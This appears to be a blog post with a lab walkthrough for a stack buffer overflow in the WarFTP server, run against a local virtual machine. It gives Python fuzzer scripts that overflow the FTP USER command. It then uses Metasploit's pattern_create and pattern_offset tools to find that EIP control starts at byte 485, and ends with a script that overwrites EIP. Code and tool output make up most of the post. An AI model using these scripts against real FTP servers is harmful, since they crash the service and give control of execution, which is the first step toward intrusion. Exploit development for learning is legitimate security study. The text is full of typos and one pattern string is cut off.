- WarFTP
- Debugger use OllyDBG
- Fuzzer to fuzzing
- Python creat Fuzzer and exploit
Creata fuzzy file..
root@bt:~# nano fuzzer.py
#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET,
socket.SOCK_STREAM)
buffer="\x41"*1000
s.connect(('192.168.56.101',21))
data=s.recv(1024)
print("Sending evildata via USER
Commad...")
s.send('USER '+buffer+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD'+'\r\n')
s.close()
print("FINISH")
buffer="\x41"*1000
is to creat "A" until 1000 character, it wil overflow on buffer
To Execution Fuzzer, first run Warftp and Porpetis > Start
Service
test conection using #nc 192.168.56.101
21
192.168.56.101 is Ip local, 21 is port
open WarFTP
Run Debugger OllyDbg, attach Warftp
execiute fuzzer..
look,, register EIP filed by character A..
nexstep pis to find on how many byte EIP stack. we can use pattern create
create string pattern use pattern_crreate.rb
Root@bt:/opt/metasploit/msf3/tools#
./pattern_create.rb 1000 > string_pattern.txt
show string_pattern use editor
copy and paste on fuzzer.py to change
execiute fuzzer..
look on debugger
use pattern offest to count how many byte from pattern from pattern_create.rb
EIP : 32714131
root@bt:/opt/metasploit/msf3/tools#
./pattern_offset.rb 32714131
485
ESP : q4Aq5Aq
root@bt:/opt/metasploit/msf3/tools#
./pattern_offset.rb q4Aq5Aq
493
to a chive EIP register we need data for 485 byte,
to prove EIP register can be overwrite on byte 486, 487, 488 and 489 we exploit fuzzer.py
#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET,
socket.SOCK_STREAM)
#buffer="\x41"*1000
#buffer="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1A$
nilaiEIP="\x90"*485
nilaiEIP+="\xEF\xBE\xAD\xDE"
s.connect(('192.168.56.101',21))
data=s.recv(1024)
print("Sending evildata via USER
Commad...")
s.send('USER '+nilaiEIP+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD'+'\r\n')
s.close()
print("FINISH")
execute fuzzer.py
Tidak ada komentar:
Posting Komentar